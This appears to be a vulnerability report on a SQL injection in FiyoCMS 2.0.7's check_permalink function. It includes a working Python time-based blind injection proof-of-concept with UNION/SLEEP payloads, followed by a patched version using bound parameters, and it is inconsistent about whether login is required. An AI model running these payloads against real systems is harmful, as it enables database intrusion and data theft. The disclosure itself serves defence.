Good day.
I found a SQL injection vulnerability in FiyoCMS 2.0.7. This vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database.
There is no need to log in when exploiting this vulnerability.
Noticed that the function check_permalink puts the parameter $_REQUEST['link'] into the database query without filtering.
File: system/function.php
```php
function check_permalink($field, $value, $output = null, $like = null) {
    // $field and $value are interpolated straight into the WHERE clause;
    // $value arrives from $_REQUEST['link'] unescaped.
    if (empty($like))
        $link = FQuery("permalink", "$field = '$value'", $output);
    else
        $link = FQuery("permalink", "$field LIKE '%$value%'", $output);
    if (empty($value) or empty($link))
        $link = false;
    else if (empty($output) AND $link > 0)
        $link = true;
    return $link;
}
```
Python PoC code:
```python
import requests
import time

if __name__ == '__main__':
    Target_url = 'http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/'
    print 'Began to guess the length of the database user name !!'
    for x in range(50):
        start_time = time.time()
        payload = '''?link=u'union/**/select/**/1,2,3,4,0/**/or/**/if(length(user())={x},sleep(0.3),0)/**/or/**/0,'6'''.format(x=x)
        headers = {'Referer': Target_url}
        response = requests.get(
            Target_url + '/' + payload,
            headers=headers)
        end_time = time.time()
        if (end_time - start_time) > 1:
            length = x
            break
    print 'The database user name length is {length} !!'.format(length=length)
    print 'Start guessing the database username !!'
    username = ''
    for x in range(length + 1):
        pay_str = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
        for p in pay_str:
            start_time = time.time()
            headers = {'Referer': Target_url}
            payload = '''?link=u'union/**/select/**/1,2,3,4,0/**/or/**/if(substr(user(),{q},1)='{w}',sleep(0.3),0)/**/or/**/0,'6'''.format(q=x, w=p)
            response = requests.get(
                Target_url + '/' + payload,
                headers=headers)
            end_time = time.time()
            if (end_time - start_time) > 1:
                username = username + p
                print username
                break
    print 'The database user name is {username}'.format(username=username)
```
I hope you can fix it as soon as possible. If there are any questions, please send me the details to my email at xm001test@gmail.com
File location: /system/site.php
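On the fix side, here is an added example (not FiyoCMS's own code; FQuery's real signature is not shown on this page) of the same permalink lookup done with a whitelisted column name and a PDO bound parameter; the $db handle, the table name and the column list are assumptions.

```php
<?php
// Added example, not FiyoCMS code: the permalink lookup rewritten so that the
// request value is sent as a bound parameter. Assumed: a PDO connection to
// MySQL ($db), a table named permalink, and the column names in $allowed.
function check_permalink_safe(PDO $db, $field, $value, $output = null, $like = null)
{
    // A column name cannot be bound, so it must come from a fixed list,
    // never from the request.
    $allowed = ['link', 'id', 'app', 'type'];  // assumed column names
    if (!in_array($field, $allowed, true)) {
        throw new InvalidArgumentException("unknown permalink field: $field");
    }
    if ($value === null || $value === '') {
        return false;  // mirrors the original empty($value) check
    }

    if (empty($like)) {
        $sql  = "SELECT * FROM permalink WHERE `$field` = :value";
        $bind = $value;
    } else {
        // Wildcards live in the bound value, not in the SQL text. Escape any
        // % or _ the caller supplied so they match literally (MySQL's default
        // LIKE escape character is the backslash).
        $sql  = "SELECT * FROM permalink WHERE `$field` LIKE :value";
        $bind = '%' . addcslashes($value, '%_\\') . '%';
    }

    $stmt = $db->prepare($sql);
    $stmt->bindValue(':value', $bind, PDO::PARAM_STR);
    $stmt->execute();
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);

    if (!$rows) {
        return false;
    }
    // Original semantics: with no $output requested, only report existence.
    return empty($output) ? true : $rows;
}

// Whatever arrives in $_REQUEST['link'] (quotes, UNION, SLEEP(...) included)
// is now data handed to the driver, never part of the query text.
// $db = new PDO('mysql:host=127.0.0.1;dbname=fiyo', 'user', 'pass',
//               [PDO::ATTR_EMULATE_PREPARES => false]);
// var_dump(check_permalink_safe($db, 'link', $_REQUEST['link'] ?? ''));
```

Disabling emulated prepares makes MySQL itself parse the statement before the value is supplied, so the time-based probe in the PoC above can no longer influence the query.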